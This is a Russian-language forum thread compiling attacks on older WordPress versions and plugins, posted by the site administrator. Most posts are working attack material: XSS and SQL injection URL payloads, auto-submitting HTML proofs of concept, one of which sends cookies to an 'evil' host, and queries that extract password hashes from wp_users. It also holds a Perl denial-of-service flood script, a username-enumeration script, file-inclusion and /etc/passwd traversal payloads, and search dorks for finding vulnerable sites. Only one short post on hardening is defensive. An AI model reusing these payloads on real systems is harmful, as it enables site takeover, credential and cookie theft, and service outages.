ГлавнаяРегистрацияВход
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 7
  • 1
  • 2
  • 3
  • 6
  • 7
  • »
Проверка сайта на уязвимости! » Форум » Уязвимости » Обзор уязвимостей WordPress
Обзор уязвимостей WordPress
DecideДата: Среда, 14.11.2012, 10:21 | Сообщение # 1
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
Full path disclosure:

WordPress < 1.5.2

Cross-site Scripting:
/wp-login.php?action=login&redirect_to=[XSS]
/wp-admin/templates.php?file=[XSS]
/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=[XSS]
http://www.example.com/wp-admi....e=[XSS]
http://www.example.com/wp-admin/templates.php?file=[XSS]
http://www.example.com/wp-admin/link-add.php?linkurl=[XSS]
http://www.example.com/wp-admin/link-add.php?name=[XSS]
http://www.example.com/wp-admi....on=Edit
http://www.example.com/wp-admin/link-manager.php?order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?cat_id=[XSS]
http://www.example.com/wp-admi....l=[XSS]
http://www.example.com/wp-admi....e=[XSS]
http://www.example.com/wp-admi....n=[XSS]
http://www.example.com/wp-admi....l=[XSS]
http://www.example.com/wp-admi....e=[XSS]
http://www.example.com/wp-admi....i=[XSS]
http://www.example.com/wp-admi....s=[XSS]
http://www.example.com/wp-admi....d=[XSS]
http://www.example.com/wp-admi....y=[XSS]
http://www.example.com/wp-admi....d=[XSS]
http://www.example.com/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admi....d=[XSS]

SQL injection examples:
http://www.example.com/index.php?m=[SQL]
http://www.example.com/wp-admin/edit.php?m=[SQL]
http://www.example.com/wp-admi....on=Edit
http://www.example.com/index.php?cat=100)%09or%090=0%09or%09(0=1

Tables/Prefix_/Columns:
wp_

Hash algorithms:
md5(password)

WordPress Vulnerability Scanner
Код:

$ perl -x wp-scanner.pl http://testblog/wordpress/

WordPress Scanner starting: David Kierznowski (http://michaeldaw.org)

Using plugins dir: wp-content/plugins
  • Initial WordPress Enumeration
  • Finding WordPress Major Version
  • Testing WordPress Template for XSS

    WordPress Basic Results

    wp-commentsrss2.php => Version Leak: WordPress 2.1.3
    wp-links-opml.php => Version Leak: WordPress 2.1.3
    wp-major-ver => Version 2.1
    wp-rdf.php => Version Leak: WordPress 2.1.3
    wp-rss.php => Version Leak: WordPress 2.1.3
    wp-rss2.php => Version Leak: WordPress 2.1.3
    wp-server => Apache/1.3.34 (Unix) PHP/4.4.4 mod_ssl/2.8.25 OpenSSL/0.9.8a
    wp-style-dir => http://testblog/wordpress/wp-content/themes/time1-theme-10/style.css
    wp-title => Test Blog
    wp-version => WordPress 2.1.3
    x-Pingback => http://testblog/wordpress/xmlrpc.php

    WordPress Plugins Found
  •  
    DecideДата: Среда, 14.11.2012, 10:21 | Сообщение # 2
    Полковник
    Группа: Администраторы
    Сообщений: 241
    Репутация: 0
    Статус: Offline
    simple PoC:
    Код HTML:
    <html>
    <head></head>
    <body>

    <form method="post" action="http://target/wordpress/wp-register.php" >
    <input type="hidden" name="action" value="register" />
    <input type="hidden" name="user_login" id="user_login"
    value='"><script>alert(1)</script>' />
    <input type="hidden" name="user_email" id="user_email"
    value='"><script>alert(2)</script>' />
    </form>
    <script>document.forms[0].submit()</script>
    </body>
    </html>

    cookie theft PoC:

    Код HTML:
    <html>
    <head></head>
    <body>

    <form method="post"
    action="http://target/wordpress/wp-register.php#location='http://evil/?'+document.cookie"
    >
    <input type="hidden" name="action" value="register" />
    <input type="hidden" name="user_login" id="user_login" value="anyusername" />
    <input type="hidden" name="user_email" id="user_email"
    value='"><script>eval(location.hash.substr(1))</script>' />

    </form>
    <script>document.forms[0].submit()</script>
    </body>
    </html>

    unrestricted script insertion from third-party site

    (we prove we can
    inject ANY JS):

    Код HTML:
    <html>
    <head></head>
    <body>

    <form method="post" action="http://victim/wordpress/wp-register.php" >
    <input type="hidden" name="action" value="register" />
    <input type="hidden" name="user_login" id="user_login" value="test" />
    <input type="hidden" name="user_email" id="user_email"
    value='"><SCRIPT src=http://evil/jsfile></SCRIPT>'>
    </form>
    <script>document.forms[0].submit()</script>
    </body>
    </html>
    __________________
     
    DecideДата: Среда, 14.11.2012, 10:22 | Сообщение # 3
    Полковник
    Группа: Администраторы
    Сообщений: 241
    Репутация: 0
    Статус: Offline
    07 июня, 2007
    Программа: WordPress 2.2, возможно более ранние версии

    Опасность: Средняя

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

    Уязвимость существует из-за недостаточной обработки входных данных в методе "wp.suggestCategories" в сценарии xmlrpc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

    Для выполнения этого нужно что была разрешена регистрация на сайте, отправляется запрос только POST
    Вот пример запроса
    Код HTML:
    <methodCall>
    <methodName>wp.suggestCategories</methodName>
    <params>
    <param><value>1</value></param>
    <param><value>Здесь логин</value></param>
    <param><value>Сдесь пароль</value></param>
    <param><value>1</value></param>
    <param><value>0 UNION SELECT USER()</value></param>
    </params>
    </methodCall>
     
    DecideДата: Среда, 14.11.2012, 10:22 | Сообщение # 4
    Полковник
    Группа: Администраторы
    Сообщений: 241
    Репутация: 0
    Статус: Offline
    Wordpress 2.2 Username Enumeration
    Code
    #!/bin/bash  

    # this script attacks a low-risk username enumeration vul  
    # on Wordpress 2.2 login page. Previous versions are  
    # possibly affected as well  
    #  
    # Note: you need curl [http://curl.haxx.se/download.html]  
    # installed on your system for this script to work.  
    #  
    # Adrian Pastor - http://www.gnucitizen.org/  

    if [ $# -ne 2 ]  
    then  
            echo "need to parameters! correct syntax is:"  
            echo "$0 <ip-or-hostname> <wordlist-filename>"  
            exit 1  
    fi  

    for U in `cat $2`  
    do  
            #echo $U  

            if curl -s -d  
    "log=$U&pwd=mypassword&wp-submit=Login+%C2%BB&redirect_to=" --url  
    "http://$1/wordpress/wp-login.php" | grep -i 'Incorrect password' >  
    /dev/null  
            then  
                    echo "username found!: $U" # print username found on screen  
                    echo $U >> $0.found # save results to file equals to  
    script name plus .found extension  
            fi  
    done
     
    DecideДата: Среда, 14.11.2012, 10:22 | Сообщение # 5
    Полковник
    Группа: Администраторы
    Сообщений: 241
    Репутация: 0
    Статус: Offline
    WordPress Security Whitepaper
    Table of Contents
    * Introduction
    * Installing WordPress
    o Accessing your WordPress tables
    o Changing your WordPress Table Prefix
    o Before Installation
    o Manually Change
    o Through WP Prefix Table Changer
    * Preparing the Blog
    o Changing your Admin Username
    o Create a new limited access user
    * Hardening your WP Install
    o Restricting wp-content & wp-includes
    o Restricting wp-admin
    o Block all except your IP
    o Password Required - .htpasswd
    o The .htaccess file
    o The .htpasswd file
    * MUSTHAVE Plugins
    o WPIDS - Detect Intrusions
    o WordPress Plugin Tracker – Are you updated?
    o WordPress Online Security Scanner

    http://blogsecurity.net/projects/secure-wp-whitepaper.pdf
     
    DecideДата: Среда, 14.11.2012, 10:24 | Сообщение # 6
    Полковник
    Группа: Администраторы
    Сообщений: 241
    Репутация: 0
    Статус: Offline
    WordPress PHP_Self Cross-Site Scripting Vulnerability
    Code
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
             "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">  
    <head>
      <title>Wordpress XSS PoC</title>
    </head>
    <body id="main">

      <form action="http://localhost/wp/wp-admin/theme-editor.php/'><img src=a onerror=document.forms[0].submit()><.php" method="post">
       <p>
        <textarea name="newcontent" rows="8" cols="40"><?php echo "Owned! " . date('F d, Y'); ?></textarea>
       </p>
       <p>
        <input type="hidden" name="action" value="update" />
        <input type="hidden" name="file" value="wp-content/themes/default/index.php" />   
       </p>[code]
      </form>  
      <script type="text/javascript">
      // <![CDATA[
       document.forms[0].submit();
      // ]]>
      </script>
    </body>
    </html>


    Vulnerable URI
    Code
    /wp-admin/plugins.php?page=akismet-key-config


    Vulnerable Post variable:
    Code
    _wp_http_referer="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100  ,111,99,117,109,101,110,116,46,99,111,111,107,105,  101,41))</script>"
     
    DecideДата: Среда, 14.11.2012, 10:24 | Сообщение # 7
    Полковник
    Группа: Администраторы
    Сообщений: 241
    Репутация: 0
    Статус: Offline
    runPHP Plugin
    /wp-admin/post.php?action=edit&post=1/*SQLINJECTION*/%20AND%201′=0

    WP <2.3
    http://target/wp-admin/edit-post-rows.php?posts_columns[]=<script >alert(1)</script>

    WordPress 2.0.1 Remote DoS Exploit

    Code
    #!perl  
    #Greets to all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev <img src="http://s49.ucoz.net/sm/1/wink.gif" border="0" align="absmiddle" alt="wink" />
    #The exploit was tested on 10 machines but not all got flooded.Only 6/10 got crashed  
    use Socket;
    if (@ARGV < 2) { &usage; }
    $rand=rand(10);  
    $host = $ARGV[0];
    $dir = $ARGV[1];  
    $host =~ s/(http:\/\/)//eg; #no http://
    for ($i=0; $i<99999999999999999999999999999999999999999999999999  99999999999999999999; $i++) #0_o <img src="http://s49.ucoz.net/sm/1/smile.gif" border="0" align="absmiddle" alt="smile" />
    {  
    $user="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x  6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S !  
    $data = "action=register&user_login=$user&user_email=$user\@matrix.org&submit=Register+%C2%BB";
    $len = length $data;  
    $foo = "POST   ".$dir."wp-register.php HTTP/1.1\r\n".  
                    "Accept: */*\r\n".
                    "Accept-Language: en-gb\r\n".
                    "Content-Type: application/x-www-form-urlencoded\r\n".
                    "Accept-Encoding: gzip, deflate\r\n".  
                    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
                    "Host: $host\r\n".
                    "Content-Length: $len\r\n".
                    "Connection: Keep-Alive\r\n".  
                    "Cache-Control: no-cache\r\n\r\n".
      "$data";
          my $port = "80";
          my $proto = getprotobyname('tcp');
          socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
          connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
          send(SOCKET,"$foo", 0);  
          syswrite STDOUT, "+";  
    }  
    #s33 if the server is down
    print "\n\n";
    system('ping $host');
    sub usage {
    print "\n\t(W)ordpress 2.0.1 (R)emote (D)oS (E)xploit (B)y matrix_killer\n";
    print "\te-mail: matrix_k\@abv.bg\n";
    print "\tusage: \n";
    print "\t$0 <host> </dir/>\n";  
    print "\tex: $0 127.0.0.1 /wordpress/\n";
    print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n";
    exit();
    };
     
    DecideДата: Среда, 14.11.2012, 10:25 | Сообщение # 8
    Полковник
    Группа: Администраторы
    Сообщений: 241
    Репутация: 0
    Статус: Offline
    Раскрытие Пути
    Код:

    http://[target]/[path]/wp-content/plugins/akismet/akismet.php

    WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability
    Code
    #Author: S.W.A.T.

    #cont@ct: svvateam@yahoo.com

    --------------------------------------------------------------------------------

    ------------------------- -------------------------------------------------------

    Application :  BackUpWordPress 0.4.2b

    Download    :  http://wordpress.designpraxis.at/download/backupwordpress.zip

    --------------------------------------------------------------------------------
    Vuln :

    require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";

    --------------------------------------------------------------------------------

    Exploit:

    http://[target]/_path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?

    http://[target]/_path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?

    http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?

    http://[target]/_path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?

    & other Files & Folders In The [Archive] Folder

    --------------------------------------------------------------------------------

    Dork:

    "inurl:/plugins/BackUp"
     
    DecideДата: Среда, 14.11.2012, 10:25 | Сообщение # 9
    Полковник
    Группа: Администраторы
    Сообщений: 241
    Репутация: 0
    Статус: Offline
    Sql Injection in wordpress 2.3.1

    Code
    Author : Beenu Arora

    Mail : beenudel1986 (at) gmail (dot) com [email concealed]

    Application : WordPress (2.3.1)

    Homepage: http://wordpress.org/

    ~~~~~~~~~~~~~~~~~~SQL Injection ~~~~~~~~~~~~

    Vulnerable URL : http://localhost/path_to_wordpress/?feed=rss2&p=

    Parameter : P

    POC = http://localhost/path_to_wordpress/?feed=rss2&p=11/**/union/**/select/**
    /concat(user_password,char(100),username),2/**/from/**/wp_users/**/where
    /**/user_id=1/*
     
    DecideДата: Среда, 14.11.2012, 10:34 | Сообщение # 10
    Полковник
    Группа: Администраторы
    Сообщений: 241
    Репутация: 0
    Статус: Offline
    WordPress Charset SQL Injection Vulnerability

    Недостаточная фильтрация при GBK-кодировке базы приводит к SQL-injection.
    ( Статья описания уязвимости на Античате: https://forum.antichat.ru/thread62109.html )

    Exploit:
    http://localhost/wordpre....,16,17, 18,19,20,21,22,23,24/**/FROM/**/wp_users%23

    _http://ilia.ws/archives/103-mysql_real_escape_string-
    versus-Prepared-Statements.html

    Код:
    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    === WordPress Charset SQL Injection Vulnerability ===

    Release date: 2007-12-10
    Last modified: 2007-12-10
    Source: Abel Cheung
    Affected version: WordPress escape($gpc);
    }

    Finally, escape() method belongs to wp-includes/wp-db.php:

    function escape($string) {
    return addslashes( $string ); // Disable rest for now, causing problems
    ......
    }

    3. Proof of concept

    a. After WordPress installation, modify wp-config.php to make sure
    it uses certain character set for database connection (Big5 can
    also be used):
    define('DB_CHARSET', 'GBK');

    b. http://localhost/wordpre....,16,17, 18,19,20,21,22,23,24/**/FROM/**/wp_users%23

    4. Workaround

    Note: This vulnerability only exists for database queries performed
    using certain character sets. For databases created in most other
    character sets no remedy is needed.

    a. It is recommended to convert WordPress database to use character sets not
    vulnerable to such SQL exploit. One such charset is UTF-8, which does not
    use backslash ('\') as part of character and it supports various languages.
    b. Alternatively, edit WordPress theme to remove search capability.

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.4.6 (GNU/Linux)
    Comment: http://firegpg.tuxfamily.org

    iD8DBQFHXVXGQVLh8cZxhv8RAgjgAKDwvrrO6hJbnV0/VFah5W+i8grYcwCgzyCT
    5RKJG+zo/mktmRU3v1IfmXE=
    =2okr
    -----END PGP SIGNATURE-----
     
    DecideДата: Среда, 14.11.2012, 10:35 | Сообщение # 11
    Полковник
    Группа: Администраторы
    Сообщений: 241
    Репутация: 0
    Статус: Offline
    Wordpress 2.3.1 - Broken Access Control is_admin()
    Получение админских привелегий в обход пароля.

    Код:
    By Michael Brooks

    Vulnerability:Broken Access Control

    Homepage:http://wordpress.org/download

    Software: Wordpress

    Version affected:2.3.1 (Latest at the time of writing)

    The impact of the flaw is that an attacker can read posts while they are still drafts. This is an ability that only the administrator should have. Imagine a stranger being able to read the news before it is published. Or perhaps a spam-blog harvesting posts before they are published.

    This flaw is because Wordpress is trusting the $_SERVER['REQUEST_URI'] global variable. Manipulation of $_SERVER['REQUEST_URI']has led to many xss flaws. Although an attacher shouldn't be able to control all $_SERVER variables, none of them should be trusted.

    exploit:

    htttp://localhost/wordpress/'wp-admin/

    This will cause both $_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF'] to contain the value:
    htttp://localhost/wordpress/'wp-admin/

    Vulnerable function:

    line 34, in ./wp-includes/query.php.

    function is_admin () {

    global $wp_query;

    return ($wp_query->is_admin || (stripos($_SERVER['REQUEST_URI'], 'wp-admin/') !== false));

    }

    The same flaw is duplicted in again on line 645 of the same file.

    This url: htttp://localhost/wordpress/'wp-admin/
    will cause the is_admin() function to return true. This flaw works regardless of regis
     
    DecideДата: Среда, 14.11.2012, 10:35 | Сообщение # 12
    Полковник
    Группа: Администраторы
    Сообщений: 241
    Репутация: 0
    Статус: Offline
    Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability

    Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
    D.Script : http://downloads.wordpress.org/plugin/pictpress.release-0.91.zip
    Vuln Code :
    In Line 5,6,7,8 :
    $path = $_GET['path'];
    $size = $_GET['size'];
    $base = dirname(__FILE__) . "/..";
    $cache = "$base/cache/$size/$path";
    In Line 22 :
    readfile($cache);
    POC :
    /wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00
     
    DecideДата: Среда, 14.11.2012, 10:35 | Сообщение # 13
    Полковник
    Группа: Администраторы
    Сообщений: 241
    Репутация: 0
    Статус: Offline
    For attacking admin only (at options page):

    1
    Код HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit © 2007 MustLive. http://websecurity.com.ua</title >
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_email" value='"><script>alert(document.cookie)</script>' />
    </form>
    </body>
    </html>
     
    DecideДата: Среда, 14.11.2012, 10:36 | Сообщение # 14
    Полковник
    Группа: Администраторы
    Сообщений: 241
    Репутация: 0
    Статус: Offline
    directory traversal vulnerabilities in WP 2.0.11(win only)

    PHP код:
    function validate_file(..)
    if (false !== strpos($file, ‘./’))

    Код:
    Proof of concept:
    http://site/wp-admin/index.php?page= \..\..\.htaccess
     
    DecideДата: Среда, 14.11.2012, 10:40 | Сообщение # 15
    Полковник
    Группа: Администраторы
    Сообщений: 241
    Репутация: 0
    Статус: Offline
    Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability
    Файловый менеджер находится тут:
    Code
    http://[TARGEt]/[path_wordpress]/wp-content/plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php


    После загрузки скрипт вы найдете в этом каталоге:

    Код:
    http://[TARGEt]/[path_wordpress]/uploaded/[evil].(php)

    Запрос для поиска:

    Код:
    plugins/wp-filemanager/
    inurl:/wp-filemanager/
     
    Проверка сайта на уязвимости! » Форум » Уязвимости » Обзор уязвимостей WordPress
    • Страница 1 из 7
    • 1
    • 2
    • 3
    • 6
    • 7
    • »
    Поиск:

    Вторник, 24.05.2022, 04:18
    Copyright MyCorp © 2022Бесплатный хостинг uCoz